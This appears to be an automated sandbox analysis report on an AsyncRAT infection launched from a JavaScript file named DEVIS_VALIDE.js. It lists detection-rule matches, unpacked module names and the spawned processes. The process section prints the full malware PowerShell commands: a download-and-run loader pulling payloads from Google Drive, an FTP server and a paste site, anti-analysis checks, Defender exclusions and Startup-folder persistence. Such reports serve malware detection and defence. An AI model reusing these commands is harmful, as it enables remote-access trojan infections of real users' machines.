Source: 00000020.00000002.2087880132.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000002C.00000002.2333261639.0000015586871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000035.00000002.2425933120.000001D3332B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000014.00000002.2013251264.0000020ECE7E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000035.00000002.2425933120.000001D3335B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000002C.00000002.2333261639.000001558655B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000014.00000002.2013251264.0000020ECE53D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001C.00000002.2070695014.000001E6808CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000024.00000002.2195585060.000001DE3D7DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000024.00000002.2195585060.000001DE3DAEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001C.00000002.2070695014.000001E6805BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2568, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1820, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8700, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8224, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, Settings.cs	Base64 encoded string: 'ZG6hMqbSESP476OwP+fBynGNexEnlHJpEYqfPFgvw99g84U2qxnc7qYG5cVgM2XG', 'ot3Fkq0zGKmErTQmMnNssmTgnmd5SLTGdTBrkTW204xIDIbal9/lwy2QzbFgQUUb', '/Gh/fO3XS+W/GgENDrpU9UZwRTcLQ55GedhN7J/003Jq1W/QvhhX9hxxN2gbCWVY'
Source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, Settings.cs	Base64 encoded string: 'ZG6hMqbSESP476OwP+fBynGNexEnlHJpEYqfPFgvw99g84U2qxnc7qYG5cVgM2XG', 'ot3Fkq0zGKmErTQmMnNssmTgnmd5SLTGdTBrkTW204xIDIbal9/lwy2QzbFgQUUb', '/Gh/fO3XS+W/GgENDrpU9UZwRTcLQ55GedhN7J/003Jq1W/QvhhX9hxxN2gbCWVY'
Source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, Settings.cs	Base64 encoded string: 'ZG6hMqbSESP476OwP+fBynGNexEnlHJpEYqfPFgvw99g84U2qxnc7qYG5cVgM2XG', 'ot3Fkq0zGKmErTQmMnNssmTgnmd5SLTGdTBrkTW204xIDIbal9/lwy2QzbFgQUUb', '/Gh/fO3XS+W/GgENDrpU9UZwRTcLQ55GedhN7J/003Jq1W/QvhhX9hxxN2gbCWVY'
Source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, Settings.cs	Base64 encoded string: 'ZG6hMqbSESP476OwP+fBynGNexEnlHJpEYqfPFgvw99g84U2qxnc7qYG5cVgM2XG', 'ot3Fkq0zGKmErTQmMnNssmTgnmd5SLTGdTBrkTW204xIDIbal9/lwy2QzbFgQUUb', '/Gh/fO3XS+W/GgENDrpU9UZwRTcLQ55GedhN7J/003Jq1W/QvhhX9hxxN2gbCWVY'
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack, Settings.cs	Base64 encoded string: 'ZG6hMqbSESP476OwP+fBynGNexEnlHJpEYqfPFgvw99g84U2qxnc7qYG5cVgM2XG', 'ot3Fkq0zGKmErTQmMnNssmTgnmd5SLTGdTBrkTW204xIDIbal9/lwy2QzbFgQUUb', '/Gh/fO3XS+W/GgENDrpU9UZwRTcLQ55GedhN7J/003Jq1W/QvhhX9hxxN2gbCWVY'

Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winJS@93/83@6/6

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2112:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8708:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\HLfH6HTja99GuzBA
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ldwhjyp.2hg.ps1

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DEVIS_VALIDE.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 +
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv \| Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz \| Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg \| Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\DEVIS_VALIDE.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\pesister.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Roaming\pesister.ps1
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
